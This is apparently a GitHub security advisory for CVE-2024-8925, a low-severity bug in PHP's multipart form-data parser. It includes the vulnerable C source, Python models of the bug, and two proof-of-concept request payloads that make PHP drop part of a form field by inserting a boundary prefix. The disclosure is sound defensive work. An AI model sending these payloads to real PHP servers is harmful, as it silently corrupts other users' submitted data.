
Erroneous parsing of multipart form data

Low
bukka published GHSA-9pqp-7h25-4f32 Sep 27, 2024

Package

No package listed

Affected versions

< 8.1.30
< 8.2.24
< 8.3.12

Patched versions

8.1.30
8.2.24
8.3.12

Description

Summary

Erroneous parsing of multipart form data contained in an HTTP POST request could cause legitimate data to go unprocessed, thus violating data integrity.

Details

A bug was discovered in the parsing of multipart form data, affecting both file and input form fields. If a multipart form data payload contains a valid prefix X of the declared boundary B such that 5 KiB < |X| < |B| < 8 KiB, the logic that parses and stores the multipart payload fails to correctly extract the content between two boundaries, which violates data integrity. The issue lies in the partial-match handling of the following function:

```c
// main/rfc1867.c:556
/*
 * Search for a string in a fixed-length byte string.
 * If partial is true, partial matches are allowed at the end of the buffer.
 * Returns NULL if not found, or a pointer to the start of the first match.
 */
static void *php_ap_memstr(char *haystack, int haystacklen, char *needle, int needlen, int partial)
{
	int len = haystacklen;
	char *ptr = haystack;
	/* iterate through first character matches */
	while( (ptr = memchr(ptr, needle[0], len)) ) {
		/* calculate length after match */
		len = haystacklen - (ptr - (char *)haystack);
		if (memcmp(needle, ptr, needlen < len ? needlen : len) == 0 && (partial || len >= needlen)) { // partial match here if partial != 0
			break;
		}
		/* next character */
		ptr++; len--;
	}
	return ptr;
}
```
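To make the partial-match rule concrete, here is a small Python model of php_ap_memstr(). It is a sketch, not PHP code: byte offsets stand in for the C pointers, and the needle is assumed to be boundary_next, i.e. "\n--" followed by the boundary, as it is built in rfc1867.c. A prefix of the needle that reaches the end of the buffer counts as a match when partial is set, while the same bytes stop matching once more data follows them.

```python
from typing import Optional


def php_ap_memstr(haystack: bytes, needle: bytes, partial: bool) -> Optional[int]:
    """Model of php_ap_memstr(): returns the match offset, or None.

    With partial=True, a prefix of `needle` that runs into the end of
    `haystack` is reported as a match.
    """
    pos = haystack.find(needle[:1])  # memchr() for the first needle byte
    while pos != -1:
        remaining = len(haystack) - pos  # `len` in the C code
        n = min(len(needle), remaining)
        if haystack[pos:pos + n] == needle[:n] and (partial or remaining >= len(needle)):
            return pos
        pos = haystack.find(needle[:1], pos + 1)  # "next character"
    return None


# ASSUMPTION: boundary_next is "\n--" + boundary (boundary of payload 1).
needle = b"\n--e932eddb2559cca708c5cb806f24abfb"

# The buffer ends inside the boundary: only a partial match exists.
buf = b"AAAA\r\n--e932"
print(php_ap_memstr(buf, needle, partial=True))   # 5 (offset of the "\n")
print(php_ap_memstr(buf, needle, partial=False))  # None

# With more data buffered, the prefix no longer matches; the real boundary does.
buf = b"AAAA\r\n--e932\n--e932eddb2559cca708c5cb806f24abfb--"
print(php_ap_memstr(buf, needle, partial=True))   # 12
```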

The function is called from multipart_buffer_read(), which multipart_buffer_read_body() uses to extract the content between two boundaries once the part's MIME headers have been parsed:

```c
// main/rfc1867.c:580
static size_t multipart_buffer_read(multipart_buffer *self, char *buf, size_t bytes, int *end)
{
	size_t len, max;
	char *bound;

	/* fill buffer if needed */
	if (bytes > (size_t)self->bytes_in_buffer) {
		fill_buffer(self);
	}

	/* look for a potential boundary match, only read data up to that point */
	if ((bound = php_ap_memstr(self->buf_begin, self->bytes_in_buffer, self->boundary_next, self->boundary_next_len, 1))) { // partial match on
		max = bound - self->buf_begin;
		if (end && php_ap_memstr(self->buf_begin, self->bytes_in_buffer, self->boundary_next, self->boundary_next_len, 0)) {
			*end = 1;
		}
	} else {
		max = self->bytes_in_buffer;
	}
	/* maximum number of bytes we are reading */
	len = max < bytes-1 ? max : bytes-1;

	/* if we read any data... */
	if (len > 0) {
		/* copy the data */
		memcpy(buf, self->buf_begin, len);
		buf[len] = 0;
		if (bound && len > 0 && buf[len-1] == '\r') {
			buf[--len] = 0;
		}

		/* update the buffer */
		self->bytes_in_buffer -= (int)len;
		self->buf_begin += len;
	}
	return len;
}

/*
  XXX: this is horrible memory-usage-wise, but we only expect
  to do this on small pieces of form data.
*/
static char *multipart_buffer_read_body(multipart_buffer *self, size_t *len)
{
	char buf[FILLUNIT], *out=NULL; // FILLUNIT = 5*1024
	size_t total_bytes=0, read_bytes=0;
	while((read_bytes = multipart_buffer_read(self, buf, sizeof(buf), NULL))) {
		out = erealloc(out, total_bytes + read_bytes + 1);
		memcpy(out + total_bytes, buf, read_bytes);
		total_bytes += read_bytes;
	}
	if (out) {
		out[total_bytes] = '\0';
	}
	*len = total_bytes;
	return out;
}
```
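One way to see why the prefix has to exceed roughly 5 KiB is to replay multipart_buffer_read() and multipart_buffer_read_body() in Python. This is a hypothetical, simplified model: fill() only approximates PHP's fill_buffer(), which is not quoted here; the buffer size of boundary length + 6 is an assumption; and the split passed to parse() (how much of the field is already buffered when the body read starts) is an illustrative value, since in practice it depends on the part headers and on how the SAPI delivers the request body. Under these assumptions a refill only happens when fewer than FILLUNIT bytes are buffered. If at least FILLUNIT bytes starting with "\r\n--" plus a boundary prefix sit in the buffer, the partial match is never re-checked against more data, the next read returns 0, and the loop in multipart_buffer_read_body() ends early.

```python
FILLUNIT = 5 * 1024  # as noted in multipart_buffer_read_body()


def memstr(hay: bytes, needle: bytes, partial: bool):
    """Condensed model of php_ap_memstr(): match offset or None."""
    pos = hay.find(needle[:1])
    while pos != -1:
        n = min(len(needle), len(hay) - pos)
        if hay[pos:pos + n] == needle[:n] and (partial or n == len(needle)):
            return pos
        pos = hay.find(needle[:1], pos + 1)
    return None


class MultipartBuffer:
    """Toy multipart_buffer: `buf` holds the bytes from buf_begin onward,
    `stream` the part of the request body not yet read."""

    def __init__(self, boundary: bytes, buffered: bytes, stream: bytes, bufsize: int):
        self.boundary_next = b"\n--" + boundary  # ASSUMPTION: as built in rfc1867.c
        self.buf, self.stream, self.bufsize = buffered, stream, bufsize

    def fill(self) -> None:
        # ASSUMPTION: approximates fill_buffer() by topping buf up to bufsize bytes.
        take = self.bufsize - len(self.buf)
        self.buf, self.stream = self.buf + self.stream[:take], self.stream[take:]

    def read(self, nbytes: int) -> bytes:
        # Mirrors multipart_buffer_read() with end == NULL.
        if nbytes > len(self.buf):  # refill only if fewer than nbytes are buffered
            self.fill()
        bound = memstr(self.buf, self.boundary_next, partial=True)
        limit = bound if bound is not None else len(self.buf)
        data = self.buf[:min(limit, nbytes - 1)]
        if bound is not None and data.endswith(b"\r"):
            data = data[:-1]  # the '\r' stays buffered, as in the C code
        self.buf = self.buf[len(data):]
        return data

    def read_body(self) -> bytes:
        # Mirrors multipart_buffer_read_body(): stops at the first empty read.
        out = b""
        while chunk := self.read(FILLUNIT):
            out += chunk
        return out


# Content of the "koko" field from payload 2 (part headers assumed already consumed).
B = b"A" * (6 * 1024)
field = b"BBB\r\n--" + B[:-5] + b"C" * 100 + b"\r\n--" + B + b"--"
BUFSIZE = len(B) + 6  # ASSUMPTION: buffer sized as boundary length + 6


def parse(split: int) -> bytes:
    """Read the field with field[:split] already buffered (hypothetical state)."""
    return MultipartBuffer(B, field[:split], field[split:], BUFSIZE).read_body()


ok = parse(107)    # fewer than FILLUNIT bytes buffered: refill happens first
print(len(ok), ok.count(b"C"))  # 6246 100
bad = parse(5207)  # at least FILLUNIT bytes buffered: no refill, partial match persists
print(bad)         # b'BBB'
```

With 107 bytes buffered, the refill exposes the "C" characters, the partial match fails, and the full value (6246 bytes, including all 100 "C"s) is returned. With 5207 bytes buffered no refill occurs, the prefix is taken for a boundary, and the value is truncated to b'BBB'.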

PoC

The Python payloads below were tested in a PHP-FPM environment behind an Nginx server; no special configuration was used to connect the two services. Both payloads trigger the bug:

```python
# Payload 1: the string "\r\n--e932" is missing from the value that is later
# passed to the PHP script.
boundary = "e932eddb2559cca708c5cb806f24abfb"
content_type = f"multipart/form-data; boundary={boundary}"
msg2 = f'--{boundary}\r\nContent-Disposition: form-data; name="koko"\r\n\r\n' \
    + 'A'*(5068+44) + f'\r\n--e932\n--{boundary}--'

# Payload 2: the string "\r\n--" + boundary[:len(boundary)-5] + "C"*100 is
# likewise missing from the value that is later passed to the PHP script.
boundary = 'A'*(6*1024)
content_type = f"multipart/form-data; boundary={boundary}"
body = f'--{boundary}\r\n' + 'Content-Disposition: form-data; name="koko"\r\n\r\n' \
    + f'BBB\r\n--{boundary[:len(boundary)-5]}' + 'C'*100 + f"\r\n--{boundary}--"
```
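As an arithmetic check, the injected prefix X in the second payload (the boundary minus its last five characters) falls inside the size window stated under Details:

```python
KIB = 1024

boundary = 'A' * (6 * 1024)                # B
prefix = boundary[:len(boundary) - 5]      # X, injected into the field value

print(len(prefix), len(boundary))                            # 6139 6144
print(5 * KIB < len(prefix) < len(boundary) < 8 * KIB)       # True
```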

Both payloads show that a prefix of the boundary is treated as a valid boundary: processing stops at that prefix, and the rest of the field's data is dropped.

The following PHP script illustrates the bug by writing the submitted form value to a file:

```php
<?php
$name = $_POST['koko'];
$file_path = '/tmp/parsing-bug.txt';
$file = fopen($file_path, 'w');
if ($file) {
    fwrite($file, $name . PHP_EOL);
    fclose($file);
    echo 'The name has been successfully written to the file.';
}
```
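The payloads can be POSTed to this script with Python's standard library. A minimal sketch, assuming the script is reachable at the hypothetical URL http://localhost/parsing-bug.php; the request is only built here, and the commented-out urlopen() call would send it. Passing the hand-built body as bytes keeps the multipart framing exactly as constructed, instead of letting a client library re-encode the form.

```python
import urllib.request

# HYPOTHETICAL endpoint serving the PHP script; adjust to your test setup.
URL = "http://localhost/parsing-bug.php"

# Payload 2, built exactly as in the PoC.
boundary = 'A' * (6 * 1024)
content_type = f"multipart/form-data; boundary={boundary}"
body = f'--{boundary}\r\n' + 'Content-Disposition: form-data; name="koko"\r\n\r\n' \
    + f'BBB\r\n--{boundary[:len(boundary)-5]}' + 'C' * 100 + f"\r\n--{boundary}--"


def build_request(url: str, body: str, content_type: str) -> urllib.request.Request:
    """Wrap a raw multipart body in a POST request without re-encoding it."""
    return urllib.request.Request(
        url,
        data=body.encode("ascii"),
        headers={"Content-Type": content_type},
        method="POST",
    )


req = build_request(URL, body, content_type)
# Uncomment to send against a test server you control:
# with urllib.request.urlopen(req) as resp:
#     print(resp.status, resp.read().decode())
```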

To confirm that the 100 "C"s from the second payload are not included in the resulting file:

```
# tr -cd 'C' < /tmp/parsing-bug.txt | wc -c
0
```

Impact

The parsing bug violates data integrity. If an attacker can insert a crafted payload at a chosen position alongside other users' legitimate data, and also controls other parts of the request such as the boundary, they can cause portions of the legitimate data to be excluded.

Severity

Low

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N
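The base score follows from the vector string via the CVSS v3.1 formulas. A sketch that handles only Scope: Unchanged vectors, with metric weights taken from the v3.1 specification. For this vector it yields 3.1, which falls in the "Low" band (0.1 to 3.9) and matches the severity given above.

```python
import math

# Metric weights from the CVSS v3.1 specification (Scope: Unchanged values).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},  # PR weights when S:U
    "UI": {"N": 0.85, "R": 0.62},
    "CIA": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(x: float) -> float:
    """CVSS v3.1 Roundup: smallest one-decimal value >= x (float-safe form)."""
    i = round(x * 100000)
    return i / 100000.0 if i % 10000 == 0 else (math.floor(i / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    m = dict(part.split(":") for part in vector.split("/")[1:])
    if m["S"] != "U":
        raise NotImplementedError("sketch covers Scope: Unchanged only")
    iss = 1 - ((1 - WEIGHTS["CIA"][m["C"]])
               * (1 - WEIGHTS["CIA"][m["I"]])
               * (1 - WEIGHTS["CIA"][m["A"]]))
    impact = 6.42 * iss
    exploitability = (8.22 * WEIGHTS["AV"][m["AV"]] * WEIGHTS["AC"][m["AC"]]
                      * WEIGHTS["PR"][m["PR"]] * WEIGHTS["UI"][m["UI"]])
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N"))  # 3.1
```

Here Impact = 6.42 × 0.22 ≈ 1.41 and Exploitability = 8.22 × 0.85 × 0.44 × 0.62 × 0.85 ≈ 1.62, so the sum of about 3.03 rounds up to 3.1.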

CVE ID

CVE-2024-8925

Weaknesses

Credits